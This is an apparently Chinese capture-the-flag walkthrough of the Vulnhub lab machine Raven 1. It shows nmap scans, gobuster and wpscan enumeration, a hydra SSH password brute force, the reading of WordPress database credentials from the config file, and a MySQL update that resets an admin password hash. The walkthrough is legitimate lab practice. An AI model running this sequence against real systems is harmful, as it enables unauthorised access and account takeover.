靶机Raven 1#攻略
目标:Raven 1#(Vulnhub)
首先通过扫描Kali Linux所在的本地网络识别目标的IP地址:
# nmap -sn 192.168.140.0/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-07 03:53 EDT Nmap scan report for 192.168.140.1 Host is up (0.0017s latency). MAC Address: 00:50:56:C0:00:08 (VMware) Nmap scan report for 192.168.140.2 Host is up (0.00030s latency). MAC Address: 00:50:56:EC:B5:61 (VMware) Nmap scan report for 192.168.140.153 Host is up (0.00063s latency). MAC Address: 00:0C:29:DD:14:F1 (VMware) Nmap scan report for 192.168.140.254 Host is up (0.00029s latency). MAC Address: 00:50:56:E0:D4:6C (VMware) Nmap scan report for 192.168.140.138 Host is up. Nmap done: 256 IP addresses (5 hosts up) scanned in 2.19 seconds
然后对该目标进行完全的扫描:
# nmap -sV -A -sC -p- 192.168.140.153 Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-07 03:54 EDT Nmap scan report for 192.168.140.153 Host is up (0.00061s latency). Not shown: 65531 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0) | ssh-hostkey: | 1024 26:81:c1:f3:5e:01:ef:93:49:3d:91:1e:ae:8b:3c:fc (DSA) | 2048 31:58:01:19:4d:a2:80:a6:b9:0d:40:98:1c:97:aa:53 (RSA) | 256 1f:77:31:19:de:b0:e1:6d:ca:77:07:76:84:d3:a9:a0 (ECDSA) |_ 256 0e:85:71:a8:a2:c3:08:69:9c:91:c0:3f:84:18:df:ae (ED25519) 80/tcp open http Apache httpd 2.4.10 ((Debian)) |_http-title: Raven Security |_http-server-header: Apache/2.4.10 (Debian) 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100024 1 33450/udp6 status | 100024 1 37084/tcp6 status | 100024 1 47978/tcp status |_ 100024 1 49846/udp status 47978/tcp open status 1 (RPC #100024) MAC Address: 00:0C:29:DD:14:F1 (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.61 ms 192.168.140.153
从扫描结果可以看到主要有22,80,111以及47978端口开放,需要将注意力放在80端口,看一下访问网站:
虽然首页有Login,但是点击无反应,似乎这是一个静态页面,接下来就得用gobuster对网站进行目录的枚举:
─# gobuster dir --url http://192.168.140.153 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t20 =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.140.153 [+] Method: GET [+] Threads: 20 [+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2022/04/07 04:02:17 Starting gobuster in directory enumeration mode =============================================================== /img (Status: 301) [Size: 316] [--> http://192.168.140.153/img/] /css (Status: 301) [Size: 316] [--> http://192.168.140.153/css/] /wordpress (Status: 301) [Size: 322] [--> http://192.168.140.153/wordpress/] /js (Status: 301) [Size: 315] [--> http://192.168.140.153/js/] /manual (Status: 301) [Size: 319] [--> http://192.168.140.153/manual/] /vendor (Status: 301) [Size: 319] [--> http://192.168.140.153/vendor/] /fonts (Status: 301) [Size: 318] [--> http://192.168.140.153/fonts/] Progress: 33401 / 220561 (15.14%) ^C [!] Keyboard interrupt detected, terminating.
发现了wordpress目录,可以成功访问:
但是点击hello world帖子的时候,无法访问,这是因为hosts文件没有解析域名,增加这个条目即可,既然是wordpress,因此用wpscan扫描一下有无相应的漏洞:
# wpscan --url http://192.168.140.153/wordpress --wp-content-dir -at -eu _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.18 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [i] It seems like you have not updated the database for some time. [?] Do you want to update now? [Y]es [N]o, default: [N]n [+] URL: http://192.168.140.153/wordpress/ [192.168.140.153] [+] Started: Thu Apr 7 04:13:10 2022 Interesting Finding(s): [+] Headers | Interesting Entry: Server: Apache/2.4.10 (Debian) | Found By: Headers (Passive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://192.168.140.153/wordpress/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/ | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/ [+] WordPress readme found: http://192.168.140.153/wordpress/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://192.168.140.153/wordpress/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 4.8.19 identified (Latest, released on 2022-03-11). | Found By: Emoji Settings (Passive Detection) | - http://192.168.140.153/wordpress/, Match: '-release.min.js?ver=4.8.19' | Confirmed By: Meta Generator (Passive Detection) | - http://192.168.140.153/wordpress/, Match: 'WordPress 4.8.19' [i] The main theme could not be detected. [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:00 <================================================================================> (10 / 10) 100.00% Time: 00:00:00 [i] User(s) Identified: [+] steven | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] michael | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [!] No WPScan API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register [+] Finished: Thu Apr 7 04:13:14 2022 [+] Requests Done: 50 [+] Cached Requests: 5 [+] Data Sent: 13.244 KB [+] Data Received: 344.136 KB [+] Memory used: 138.039 MB [+] Elapsed time: 00:00:04
扫描出来了两个用户:michael以及steven,很有可能michael是管理员,因此用michael作为用户名破解ssh登录密码:
# hydra -l michael -P /usr/share/wordlists/rockyou.txt ssh://192.168.140.153 255 ⨯ Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-04-07 04:18:28 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking ssh://192.168.140.153:22/ [22][ssh] host: 192.168.140.153 login: michael password: michael 1 of 1 target successfully completed, 1 valid password found
用破解得到的密码登录SSH可以成功拿到其中一个flag:
michael@Raven:~$ ls michael@Raven:~$ pwd /home/michael michael@Raven:~$ cd /var/www/ michael@Raven:/var/www$ dir flag2.txt html michael@Raven:/var/www$ cat flag2.txt flag2{fc3fd58dcdad9ab23faca6e9a36e581c}
发现本地运行着mysql服务:
michael@Raven:/var/www$ netstat -tunlp (No info could be read for "-p": geteuid()=1000 but you should be root.) Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:47978 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:587 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN - tcp6 0 0 :::111 :::* LISTEN - tcp6 0 0 :::80 :::* LISTEN - tcp6 0 0 :::22 :::* LISTEN - tcp6 0 0 :::37084 :::* LISTEN - udp 0 0 0.0.0.0:49846 0.0.0.0:* - udp 0 0 0.0.0.0:37600 0.0.0.0:* - udp 0 0 0.0.0.0:1006 0.0.0.0:* - udp 0 0 127.0.0.1:1016 0.0.0.0:* - udp 0 0 0.0.0.0:68 0.0.0.0:* - udp 0 0 0.0.0.0:111 0.0.0.0:* - udp6 0 0 :::33450 :::* - udp6 0 0 :::38065 :::* - udp6 0 0 :::1006 :::* - udp6 0 0 :::111 :::* -
那么wordpress目录中应该有连接数据库的用户名以及密码,就在config.php文件中:
/** MySQL database username */ define('DB_USER', 'root'); /** MySQL database password */ define('DB_PASSWORD', 'R@v3nSecurity');
因此尝试登陆mysql服务器:
修改michael的wordpress密码:
mysql> select * from wp_users; +----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+ | ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name | +----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+ | 1 | michael | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 | michael | michael@raven.org | | 2018-08-12 22:49:12 | | 0 | michael | | 2 | steven | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/ | steven | steven@raven.org | | 2018-08-12 23:31:16 | | 0 | Steven Seagull | +----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+ 2 rows in set (0.00 sec) mysql> update wp_users set user_pass=md5('password123') where id=1; Query OK, 1 row affected (0.01 sec) Rows matched: 1 Changed: 1 Warnings: 0
STRIVE FOR PROGRESS,NOT FOR PERFECTION
